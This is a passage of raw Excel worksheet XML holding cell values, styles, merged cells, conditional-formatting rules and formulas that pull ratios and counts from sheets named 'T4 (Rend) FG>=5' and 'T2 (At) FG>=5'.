      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="23" t="s">
        <v>640</v>
      </c>
      <c r="F27" s="24"/>
      <c r="G27" s="24"/>
      <c r="H27" s="23" t="s">
        <v>666</v>
      </c>
      <c r="I27" s="24"/>
      <c r="J27" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K27" s="23" t="s">
        <v>646</v>
      </c>
      <c r="L27" s="23"/>
      <c r="M27" s="23"/>
    </row>
    <row r="29" spans="1:17">
      <c r="H29" s="23"/>
    </row>
    <row r="30" spans="1:17">
      <c r="A30" s="23" t="s">
        <v>663</v>
      </c>
      <c r="E30" s="262" t="s">
        <v>664</v>
      </c>
      <c r="H30" s="23" t="s">
        <v>665</v>
      </c>
      <c r="J30" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K30" s="262" t="s">
        <v>2321</v>
      </c>
      <c r="L30" s="262"/>
      <c r="M30" s="262"/>
    </row>
    <row r="32" spans="1:17">
      <c r="A32" s="262" t="s">
        <v>4917</v>
      </c>
      <c r="E32" s="262" t="s">
        <v>4918</v>
      </c>
      <c r="H32" s="23" t="s">
        <v>2248</v>
      </c>
      <c r="J32" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K32" s="572" t="s">
        <v>2247</v>
      </c>
      <c r="L32" s="572"/>
      <c r="M32" s="572"/>
    </row>
    <row r="33" spans="1:3" ht="29.25" customHeight="1"/>
    <row r="34" spans="1:3">
      <c r="A34" s="576" t="s">
        <v>673</v>
      </c>
      <c r="B34" s="577">
        <v>1</v>
      </c>
      <c r="C34" s="262" t="s">
        <v>2322</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="578"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B1:J1"/>
    <mergeCell ref="K1:L1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="B3:N3"/>
    <mergeCell ref="B4:N4"/>
    <mergeCell ref="K19:Q19"/>
    <mergeCell ref="A21:D21"/>
    <mergeCell ref="A23:D23"/>
    <mergeCell ref="O5:P5"/>
    <mergeCell ref="O6:P7"/>
    <mergeCell ref="O10:P11"/>
    <mergeCell ref="B5:N5"/>
  </mergeCells>
  <conditionalFormatting sqref="E6:G6">
    <cfRule type="expression" dxfId="105" priority="25">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E7:G7">
    <cfRule type="expression" dxfId="104" priority="20">
      <formula>IF(E7&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E8:G10">
    <cfRule type="expression" dxfId="103" priority="6">
      <formula>IF(E8&lt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E11:G11">
    <cfRule type="expression" dxfId="102" priority="17">
      <formula>IF(E11&gt;B11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E12:G15">
    <cfRule type="expression" dxfId="101" priority="1">
      <formula>IF(E12&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>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2">
    <tabColor rgb="FFC00000"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S56"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="K37" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="K55" sqref="K55:N55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="37" style="26" customWidth="1"/>
    <col min="2" max="2" width="20.140625" style="214" hidden="1" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="214" hidden="1" customWidth="1"/>
    <col min="4" max="4" width="20.42578125" style="214" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="19.42578125" style="214" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="15.5703125" style="214" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="11" style="214" hidden="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="214" hidden="1" customWidth="1"/>
    <col min="9" max="9" width="16.7109375" style="214" hidden="1" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" hidden="1" customWidth="1"/>
    <col min="11" max="11" width="15.85546875" style="214" customWidth="1"/>
    <col min="12" max="12" width="21.42578125" style="214" customWidth="1"/>
    <col min="13" max="13" width="15.140625" style="214" customWidth="1"/>
    <col min="14" max="14" width="29.28515625" style="214" customWidth="1"/>
    <col min="15" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="19.5">
      <c r="A1" s="569" t="s">
        <v>2352</v>
      </c>
      <c r="B1" s="570"/>
      <c r="C1" s="570"/>
      <c r="D1" s="570"/>
    </row>
    <row r="2" spans="1:19" ht="12.75" customHeight="1">
      <c r="A2" s="571"/>
      <c r="B2" s="713"/>
      <c r="C2" s="714"/>
      <c r="D2" s="714"/>
      <c r="E2" s="714"/>
      <c r="F2" s="714"/>
      <c r="G2" s="714"/>
      <c r="H2" s="714"/>
      <c r="I2" s="714"/>
      <c r="J2" s="714"/>
      <c r="K2" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L2" s="702"/>
      <c r="M2" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N2" s="704"/>
    </row>
    <row r="3" spans="1:19" ht="28.5" customHeight="1" thickBot="1">
      <c r="A3" s="21" t="s">
        <v>641</v>
      </c>
      <c r="B3" s="21"/>
      <c r="C3" s="21"/>
      <c r="D3" s="21"/>
      <c r="E3" s="21"/>
      <c r="F3" s="21"/>
      <c r="G3" s="21"/>
      <c r="H3" s="21"/>
      <c r="I3" s="21"/>
      <c r="J3" s="310"/>
      <c r="K3" s="416" t="s">
        <v>2350</v>
      </c>
      <c r="L3" s="417" t="s">
        <v>2470</v>
      </c>
      <c r="M3" s="419" t="s">
        <v>2350</v>
      </c>
      <c r="N3" s="420" t="s">
        <v>2476</v>
      </c>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="12.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A4" s="727" t="s">
        <v>4146</v>
      </c>
      <c r="B4" s="728"/>
      <c r="C4" s="728"/>
      <c r="D4" s="728"/>
      <c r="E4" s="728"/>
      <c r="F4" s="728"/>
      <c r="G4" s="728"/>
      <c r="H4" s="728"/>
      <c r="I4" s="728"/>
      <c r="J4" s="728"/>
      <c r="K4" s="728"/>
      <c r="L4" s="728"/>
      <c r="M4" s="728"/>
      <c r="N4" s="729"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19">
      <c r="A5" s="259" t="s">
        <v>640</v>
      </c>
      <c r="B5" s="557"/>
      <c r="C5" s="557"/>
      <c r="D5" s="557"/>
      <c r="E5" s="557"/>
      <c r="F5" s="557"/>
      <c r="G5" s="557"/>
      <c r="H5" s="557"/>
      <c r="I5" s="557"/>
      <c r="J5" s="558"/>
      <c r="K5" s="559">
        <f>'T4 (Rend) FG&gt;=5'!K16</f>
        <v>0.44668205076180045</v>
      </c>
      <c r="L5" s="560">
        <f>'T4 (Rend) FG&gt;=5'!L16</f>
        <v>0.82697786029736853</v>
      </c>
      <c r="M5" s="561">
        <f>'T4 (Rend) FG&gt;=5'!M16</f>
        <v>0.35675297280530899</v>
      </c>
      <c r="N5" s="560">
        <f>'T4 (Rend) FG&gt;=5'!N16</f>
        <v>0.36927440958891483</v>
      </c>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19">
      <c r="A6" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B6" s="364"/>
      <c r="C6" s="364"/>
      <c r="D6" s="364"/>
      <c r="E6" s="364"/>
      <c r="F6" s="364"/>
      <c r="G6" s="364"/>
      <c r="H6" s="364"/>
      <c r="I6" s="364"/>
      <c r="J6" s="365"/>
      <c r="K6" s="455">
        <f>'T2 (At) FG&gt;=5'!$BM$79</f>
        <v>0.2</v>
      </c>
      <c r="L6" s="456">
        <f>'T2 (At) FG&gt;=5'!$BT$79</f>
        <v>0.82121212121212117</v>
      </c>
      <c r="M6" s="450">
        <f>'T2 (At) FG&gt;=5'!$BZ$79</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="N6" s="456">
        <f>'T2 (At) FG&gt;=5'!$CG$79</f>
        <v>0.13636363636363635</v>
      </c>
      <c r="O6" s="572"/>
      <c r="P6" s="572"/>
      <c r="Q6" s="572"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19">
      <c r="A7" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B7" s="281"/>
      <c r="C7" s="281"/>
      <c r="D7" s="281"/>
      <c r="E7" s="281"/>
      <c r="F7" s="281"/>
      <c r="G7" s="281"/>
      <c r="H7" s="281"/>
      <c r="I7" s="281"/>
      <c r="J7" s="311"/>
      <c r="K7" s="451">
        <f>SUM(K8,K9)</f>
        <v>187001</v>
      </c>
      <c r="L7" s="454">
        <f>SUM(L8,L9)</f>
        <v>14497970</v>
      </c>
      <c r="M7" s="451">
        <f>SUM(M8,M9)</f>
        <v>57</v>
      </c>
      <c r="N7" s="454">
        <f>SUM(N8,N9)</f>
        <v>58</v>
      </c>
      <c r="O7" s="572"/>
      <c r="P7" s="572"/>
      <c r="Q7" s="572"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="16.5" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B8" s="281"/>
      <c r="C8" s="281"/>
      <c r="D8" s="281"/>
      <c r="E8" s="281"/>
      <c r="F8" s="281"/>
      <c r="G8" s="281"/>
      <c r="H8" s="281"/>
      <c r="I8" s="281"/>
      <c r="J8" s="311"/>
      <c r="K8" s="451">
        <f>'T4 (Rend) FG&gt;=5'!K9</f>
        <v>45</v>
      </c>
      <c r="L8" s="454">
        <f>'T4 (Rend) FG&gt;=5'!L9</f>
        <v>342838</v>
      </c>
      <c r="M8" s="449">
        <f>'T4 (Rend) FG&gt;=5'!M9</f>
        <v>30</v>
      </c>
      <c r="N8" s="454">
        <f>'T4 (Rend) FG&gt;=5'!N9</f>
        <v>31</v>
      </c>
      <c r="O8" s="572"/>
      <c r="P8" s="572"/>
      <c r="Q8" s="572"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="12.2" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B9" s="281"/>
      <c r="C9" s="281"/>
      <c r="D9" s="281"/>
      <c r="E9" s="281"/>
      <c r="F9" s="281"/>
      <c r="G9" s="281"/>
      <c r="H9" s="281"/>
      <c r="I9" s="281"/>
      <c r="J9" s="311"/>
      <c r="K9" s="451">
        <f>'T4 (Rend) FG&gt;=5'!K13</f>
        <v>186956</v>
      </c>
      <c r="L9" s="454">
        <f>'T4 (Rend) FG&gt;=5'!L13</f>
        <v>14155132</v>
      </c>
      <c r="M9" s="449">
        <f>'T4 (Rend) FG&gt;=5'!M13</f>
        <v>27</v>
      </c>
      <c r="N9" s="454">
        <f>'T4 (Rend) FG&gt;=5'!N13</f>
        <v>27</v>
      </c>
      <c r="O9" s="572"/>
      <c r="P9" s="572"/>
      <c r="Q9" s="572"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="16.5" customHeight="1" thickBot="1">
      <c r="A10" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B10" s="283"/>
      <c r="C10" s="283"/>
      <c r="D10" s="283"/>
      <c r="E10" s="283"/>
      <c r="F10" s="283"/>
      <c r="G10" s="283"/>
      <c r="H10" s="283"/>
      <c r="I10" s="283"/>
      <c r="J10" s="313"/>
      <c r="K10" s="452">
        <f>'T4 (Rend) FG&gt;=5'!K18</f>
        <v>4154.5777777777776</v>
      </c>
      <c r="L10" s="457">
        <f>'T4 (Rend) FG&gt;=5'!L18</f>
        <v>41.288106919302997</v>
      </c>
      <c r="M10" s="453">
        <f>'T4 (Rend) FG&gt;=5'!M18</f>
        <v>0.9</v>
      </c>
      <c r="N10" s="457">
        <f>'T4 (Rend) FG&gt;=5'!N18</f>
        <v>0.87096774193548387</v>
      </c>
      <c r="O10" s="572"/>
      <c r="P10" s="572"/>
      <c r="Q10" s="572"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A11" s="734" t="s">
        <v>4461</v>
      </c>
      <c r="B11" s="735"/>
      <c r="C11" s="735"/>
      <c r="D11" s="735"/>
      <c r="E11" s="735"/>
      <c r="F11" s="735"/>
      <c r="G11" s="735"/>
      <c r="H11" s="735"/>
      <c r="I11" s="735"/>
      <c r="J11" s="735"/>
      <c r="K11" s="735"/>
      <c r="L11" s="735"/>
      <c r="M11" s="735"/>
      <c r="N11" s="736"/>
      <c r="O11" s="572"/>
      <c r="P11" s="572"/>
      <c r="Q11" s="572"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="14.25" customHeight="1">
      <c r="A12" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B12" s="546"/>
      <c r="C12" s="546"/>
      <c r="D12" s="546"/>
      <c r="E12" s="546"/>
      <c r="F12" s="546"/>
      <c r="G12" s="546"/>
      <c r="H12" s="546"/>
      <c r="I12" s="546"/>
      <c r="J12" s="547"/>
      <c r="K12" s="548">
        <v>0.44721300000000003</v>
      </c>
      <c r="L12" s="549">
        <v>0.78621600000000003</v>
      </c>
      <c r="M12" s="550">
        <v>0.35675299999999999</v>
      </c>
      <c r="N12" s="549">
        <v>0.36927399999999999</v>
      </c>
      <c r="O12" s="214"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="36.75" customHeight="1">
      <c r="A13" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B13" s="260"/>
      <c r="C13" s="260"/>
      <c r="D13" s="260"/>
      <c r="E13" s="260"/>
      <c r="F13" s="260"/>
      <c r="G13" s="260"/>
      <c r="H13" s="260"/>
      <c r="I13" s="260"/>
      <c r="J13" s="312"/>
      <c r="K13" s="436" t="s">
        <v>4779</v>
      </c>
      <c r="L13" s="437" t="s">
        <v>4861</v>
      </c>
      <c r="M13" s="315" t="s">
        <v>4129</v>
      </c>
      <c r="N13" s="437" t="s">
        <v>4129</v>
      </c>
      <c r="O13" s="262"/>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19">
      <c r="A14" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B14" s="281"/>
      <c r="C14" s="281"/>
      <c r="D14" s="281"/>
      <c r="E14" s="281"/>
      <c r="F14" s="281"/>
      <c r="G14" s="281"/>
      <c r="H14" s="281"/>
      <c r="I14" s="281"/>
      <c r="J14" s="454"/>
      <c r="K14" s="653">
        <v>2</v>
      </c>
      <c r="L14" s="458">
        <v>53</v>
      </c>
      <c r="M14" s="449"/>
      <c r="N14" s="454"/>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19">
      <c r="A15" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B15" s="364"/>
      <c r="C15" s="364"/>
      <c r="D15" s="364"/>
      <c r="E15" s="364"/>
      <c r="F15" s="364"/>
      <c r="G15" s="364"/>
      <c r="H15" s="364"/>
      <c r="I15" s="364"/>
      <c r="J15" s="456"/>
      <c r="K15" s="658" t="s">
        <v>4780</v>
      </c>
      <c r="L15" s="659" t="s">
        <v>4747</v>
      </c>
      <c r="M15" s="613"/>
      <c r="N15" s="456"/>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19">
      <c r="A16" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B16" s="281"/>
      <c r="C16" s="281"/>
      <c r="D16" s="281"/>
      <c r="E16" s="281"/>
      <c r="F16" s="281"/>
      <c r="G16" s="281"/>
      <c r="H16" s="281"/>
      <c r="I16" s="281"/>
      <c r="J16" s="454"/>
      <c r="K16" s="653">
        <f>K17+K18</f>
        <v>176</v>
      </c>
      <c r="L16" s="458">
        <f t="shared" ref="L16" si="0">L17+L18</f>
        <v>189176</v>
      </c>
      <c r="M16" s="314"/>
      <c r="N16" s="454"/>
      <c r="O16" s="572"/>
      <c r="P16" s="572"/>
      <c r="Q16" s="572"/>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:19">
      <c r="A17" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B17" s="281"/>
      <c r="C17" s="281"/>
      <c r="D17" s="281"/>
      <c r="E17" s="281"/>
      <c r="F17" s="281"/>
      <c r="G17" s="281"/>
      <c r="H17" s="281"/>
      <c r="I17" s="281"/>
      <c r="J17" s="454"/>
      <c r="K17" s="653">
        <v>43</v>
      </c>
      <c r="L17" s="458">
        <v>183274</v>
      </c>
      <c r="M17" s="314"/>
      <c r="N17" s="454"/>
      <c r="O17" s="572"/>
      <c r="P17" s="572"/>
      <c r="Q17" s="572"/>
      <c r="S17" s="214"/>
    </row>
    <row r="18" spans="1:19">
      <c r="A18" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B18" s="281"/>
      <c r="C18" s="281"/>
      <c r="D18" s="281"/>
      <c r="E18" s="281"/>
      <c r="F18" s="281"/>
      <c r="G18" s="281"/>
      <c r="H18" s="281"/>
      <c r="I18" s="281"/>
      <c r="J18" s="454"/>
      <c r="K18" s="653">
        <v>133</v>
      </c>
      <c r="L18" s="458">
        <v>5902</v>
      </c>
      <c r="M18" s="314"/>
      <c r="N18" s="454"/>
      <c r="O18" s="572"/>
      <c r="P18" s="572"/>
      <c r="Q18" s="572"/>
      <c r="S18" s="214"/>
    </row>
    <row r="19" spans="1:19" ht="13.5" thickBot="1">
      <c r="A19" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B19" s="283"/>
      <c r="C19" s="283"/>
      <c r="D19" s="283"/>
      <c r="E19" s="283"/>
      <c r="F19" s="283"/>
      <c r="G19" s="283"/>
      <c r="H19" s="283"/>
      <c r="I19" s="283"/>
      <c r="J19" s="457"/>
      <c r="K19" s="368">
        <v>1.6265000000000001</v>
      </c>
      <c r="L19" s="457">
        <v>0.72170000000000001</v>
      </c>
      <c r="M19" s="459"/>
      <c r="N19" s="457"/>
      <c r="O19" s="572"/>
      <c r="P19" s="572"/>
      <c r="Q19" s="572"/>
      <c r="S19" s="214"/>
    </row>
    <row r="20" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A20" s="737" t="s">
        <v>4462</v>
      </c>
      <c r="B20" s="735"/>
      <c r="C20" s="735"/>
      <c r="D20" s="735"/>
      <c r="E20" s="735"/>
      <c r="F20" s="735"/>
      <c r="G20" s="735"/>
      <c r="H20" s="735"/>
      <c r="I20" s="735"/>
      <c r="J20" s="735"/>
      <c r="K20" s="735"/>
      <c r="L20" s="735"/>
      <c r="M20" s="735"/>
      <c r="N20" s="736"/>
      <c r="O20" s="572"/>
      <c r="P20" s="572"/>
      <c r="Q20" s="572"/>
      <c r="S20" s="214"/>
    </row>
    <row r="21" spans="1:19" ht="14.25" customHeight="1">
      <c r="A21" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B21" s="546"/>
      <c r="C21" s="546"/>
      <c r="D21" s="546"/>
      <c r="E21" s="546"/>
      <c r="F21" s="546"/>
      <c r="G21" s="546"/>
      <c r="H21" s="546"/>
      <c r="I21" s="546"/>
      <c r="J21" s="547"/>
      <c r="K21" s="548">
        <v>0.44721300000000003</v>
      </c>
      <c r="L21" s="549">
        <v>0.76272600000000002</v>
      </c>
      <c r="M21" s="550">
        <v>0.35675297280530899</v>
      </c>
      <c r="N21" s="549">
        <v>0.36927440958891483</v>
      </c>
      <c r="O21" s="214"/>
      <c r="S21" s="214"/>
    </row>
    <row r="22" spans="1:19" ht="36.75" customHeight="1">
      <c r="A22" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B22" s="260"/>
      <c r="C22" s="260"/>
      <c r="D22" s="260"/>
      <c r="E22" s="260"/>
      <c r="F22" s="260"/>
      <c r="G22" s="260"/>
      <c r="H22" s="260"/>
      <c r="I22" s="260"/>
      <c r="J22" s="437"/>
      <c r="K22" s="436" t="s">
        <v>4779</v>
      </c>
      <c r="L22" s="437" t="s">
        <v>4782</v>
      </c>
      <c r="M22" s="315" t="s">
        <v>4129</v>
      </c>
      <c r="N22" s="437" t="s">
        <v>4129</v>
      </c>
      <c r="O22" s="262"/>
      <c r="S22" s="214"/>
    </row>
    <row r="23" spans="1:19">
      <c r="A23" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B23" s="281"/>
      <c r="C23" s="281"/>
      <c r="D23" s="281"/>
      <c r="E23" s="281"/>
      <c r="F23" s="281"/>
      <c r="G23" s="281"/>
      <c r="H23" s="281"/>
      <c r="I23" s="281"/>
      <c r="J23" s="454"/>
      <c r="K23" s="653">
        <v>2</v>
      </c>
      <c r="L23" s="458">
        <v>46</v>
      </c>
      <c r="M23" s="314"/>
      <c r="N23" s="454"/>
      <c r="S23" s="214"/>
    </row>
    <row r="24" spans="1:19">
      <c r="A24" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B24" s="364"/>
      <c r="C24" s="364"/>
      <c r="D24" s="364"/>
      <c r="E24" s="364"/>
      <c r="F24" s="364"/>
      <c r="G24" s="364"/>
      <c r="H24" s="364"/>
      <c r="I24" s="364"/>
      <c r="J24" s="456"/>
      <c r="K24" s="658" t="s">
        <v>4780</v>
      </c>
      <c r="L24" s="659" t="s">
        <v>4746</v>
      </c>
      <c r="M24" s="613"/>
      <c r="N24" s="456"/>
      <c r="S24" s="214"/>
    </row>
    <row r="25" spans="1:19">
      <c r="A25" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B25" s="281"/>
      <c r="C25" s="281"/>
      <c r="D25" s="281"/>
      <c r="E25" s="281"/>
      <c r="F25" s="281"/>
      <c r="G25" s="281"/>
      <c r="H25" s="281"/>
      <c r="I25" s="281"/>
      <c r="J25" s="454"/>
      <c r="K25" s="653">
        <f>K26+K27</f>
        <v>176</v>
      </c>
      <c r="L25" s="458">
        <f t="shared" ref="L25" si="1">L26+L27</f>
        <v>192845</v>
      </c>
      <c r="M25" s="314"/>
      <c r="N25" s="458"/>
      <c r="O25" s="572"/>
      <c r="P25" s="572"/>
      <c r="Q25" s="572"/>
      <c r="S25" s="214"/>
    </row>
    <row r="26" spans="1:19">
      <c r="A26" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B26" s="281"/>
      <c r="C26" s="281"/>
      <c r="D26" s="281"/>
      <c r="E26" s="281"/>
      <c r="F26" s="281"/>
      <c r="G26" s="281"/>
      <c r="H26" s="281"/>
      <c r="I26" s="281"/>
      <c r="J26" s="454"/>
      <c r="K26" s="653">
        <v>43</v>
      </c>
      <c r="L26" s="458">
        <v>183293</v>
      </c>
      <c r="M26" s="314"/>
      <c r="N26" s="454"/>
      <c r="O26" s="572"/>
      <c r="P26" s="572"/>
      <c r="Q26" s="572"/>
      <c r="S26" s="214"/>
    </row>
    <row r="27" spans="1:19">
      <c r="A27" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B27" s="281"/>
      <c r="C27" s="281"/>
      <c r="D27" s="281"/>
      <c r="E27" s="281"/>
      <c r="F27" s="281"/>
      <c r="G27" s="281"/>
      <c r="H27" s="281"/>
      <c r="I27" s="281"/>
      <c r="J27" s="458"/>
      <c r="K27" s="653">
        <v>133</v>
      </c>
      <c r="L27" s="458">
        <v>9552</v>
      </c>
      <c r="M27" s="314"/>
      <c r="N27" s="454"/>
      <c r="O27" s="572"/>
      <c r="P27" s="572"/>
      <c r="Q27" s="572"/>
      <c r="S27" s="214"/>
    </row>
    <row r="28" spans="1:19" ht="13.5" thickBot="1">
      <c r="A28" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B28" s="283"/>
      <c r="C28" s="283"/>
      <c r="D28" s="283"/>
      <c r="E28" s="283"/>
      <c r="F28" s="283"/>
      <c r="G28" s="283"/>
      <c r="H28" s="283"/>
      <c r="I28" s="283"/>
      <c r="J28" s="283"/>
      <c r="K28" s="368">
        <v>1.6265000000000001</v>
      </c>
      <c r="L28" s="457">
        <v>1.1458999999999999</v>
      </c>
      <c r="M28" s="459"/>
      <c r="N28" s="457"/>
      <c r="O28" s="572"/>
      <c r="P28" s="572"/>
      <c r="Q28" s="572"/>
      <c r="S28" s="214"/>
    </row>
    <row r="29" spans="1:19" ht="24" customHeight="1" thickTop="1">
      <c r="A29" s="734" t="s">
        <v>4312</v>
      </c>
      <c r="B29" s="735"/>
      <c r="C29" s="735"/>
      <c r="D29" s="735"/>
      <c r="E29" s="735"/>
      <c r="F29" s="735"/>
      <c r="G29" s="735"/>
      <c r="H29" s="735"/>
      <c r="I29" s="735"/>
      <c r="J29" s="735"/>
      <c r="K29" s="735"/>
      <c r="L29" s="735"/>
      <c r="M29" s="735"/>
      <c r="N29" s="736"/>
      <c r="O29" s="572"/>
      <c r="P29" s="572"/>
      <c r="Q29" s="572"/>
      <c r="S29" s="214"/>
    </row>
    <row r="30" spans="1:19" ht="14.25" customHeight="1">
      <c r="A30" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B30" s="546"/>
      <c r="C30" s="546"/>
      <c r="D30" s="546"/>
      <c r="E30" s="546"/>
      <c r="F30" s="546"/>
      <c r="G30" s="546"/>
      <c r="H30" s="546"/>
      <c r="I30" s="546"/>
      <c r="J30" s="547"/>
      <c r="K30" s="548">
        <v>0.44668200000000002</v>
      </c>
      <c r="L30" s="549">
        <v>0.83727200000000002</v>
      </c>
      <c r="M30" s="548">
        <v>0.35675299999999999</v>
      </c>
      <c r="N30" s="549">
        <v>0.36927399999999999</v>
      </c>
      <c r="O30" s="214" t="s">
        <v>2311</v>
      </c>
      <c r="S30" s="214"/>
    </row>
    <row r="31" spans="1:19" ht="36.75" customHeight="1">
      <c r="A31" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B31" s="260"/>
      <c r="C31" s="260"/>
      <c r="D31" s="260"/>
      <c r="E31" s="260"/>
      <c r="F31" s="260"/>
      <c r="G31" s="260"/>
      <c r="H31" s="260"/>
      <c r="I31" s="260"/>
      <c r="J31" s="312"/>
      <c r="K31" s="436" t="s">
        <v>4783</v>
      </c>
      <c r="L31" s="437" t="s">
        <v>4863</v>
      </c>
      <c r="M31" s="436" t="s">
        <v>4304</v>
      </c>
      <c r="N31" s="437" t="s">
        <v>4304</v>
      </c>
      <c r="O31" s="262" t="s">
        <v>1765</v>
      </c>
      <c r="S31" s="214"/>
    </row>
    <row r="32" spans="1:19">
      <c r="A32" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B32" s="281"/>
      <c r="C32" s="281"/>
      <c r="D32" s="281"/>
      <c r="E32" s="281"/>
      <c r="F32" s="281"/>
      <c r="G32" s="281"/>
      <c r="H32" s="281"/>
      <c r="I32" s="281"/>
      <c r="J32" s="454"/>
      <c r="K32" s="653">
        <v>4</v>
      </c>
      <c r="L32" s="458">
        <v>75</v>
      </c>
      <c r="M32" s="653">
        <v>1</v>
      </c>
      <c r="N32" s="458">
        <v>1</v>
      </c>
      <c r="S32" s="214"/>
    </row>
    <row r="33" spans="1:19">
      <c r="A33" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B33" s="364"/>
      <c r="C33" s="364"/>
      <c r="D33" s="364"/>
      <c r="E33" s="364"/>
      <c r="F33" s="364"/>
      <c r="G33" s="364"/>
      <c r="H33" s="364"/>
      <c r="I33" s="364"/>
      <c r="J33" s="456"/>
      <c r="K33" s="658">
        <f>'T2 (At) FG&gt;=5'!$BM$79</f>
        <v>0.2</v>
      </c>
      <c r="L33" s="659">
        <f>'T2 (At) FG&gt;=5'!$BT$79</f>
        <v>0.82121212121212117</v>
      </c>
      <c r="M33" s="658">
        <f>'T2 (At) FG&gt;=5'!$BZ$79</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="N33" s="659">
        <f>'T2 (At) FG&gt;=5'!$CG$79</f>
        <v>0.13636363636363635</v>
      </c>
      <c r="S33" s="214"/>
    </row>
    <row r="34" spans="1:19">
      <c r="A34" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B34" s="281"/>
      <c r="C34" s="281"/>
      <c r="D34" s="281"/>
      <c r="E34" s="281"/>
      <c r="F34" s="281"/>
      <c r="G34" s="281"/>
      <c r="H34" s="281"/>
      <c r="I34" s="281"/>
      <c r="J34" s="454"/>
      <c r="K34" s="653">
        <f t="shared" ref="K34" si="2">K35+K36</f>
        <v>186868</v>
      </c>
      <c r="L34" s="458">
        <f t="shared" ref="L34:M34" si="3">L35+L36</f>
        <v>13348313</v>
      </c>
      <c r="M34" s="653">
        <f t="shared" si="3"/>
        <v>30</v>
      </c>
      <c r="N34" s="458">
        <f t="shared" ref="N34" si="4">N35+N36</f>
        <v>31</v>
      </c>
      <c r="O34" s="572"/>
      <c r="P34" s="572"/>
      <c r="Q34" s="572"/>
      <c r="S34" s="214"/>
    </row>
    <row r="35" spans="1:19">
      <c r="A35" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B35" s="281"/>
      <c r="C35" s="281"/>
      <c r="D35" s="281"/>
      <c r="E35" s="281"/>
      <c r="F35" s="281"/>
      <c r="G35" s="281"/>
      <c r="H35" s="281"/>
      <c r="I35" s="281"/>
      <c r="J35" s="454"/>
      <c r="K35" s="653">
        <v>45</v>
      </c>
      <c r="L35" s="458">
        <v>342838</v>
      </c>
      <c r="M35" s="653">
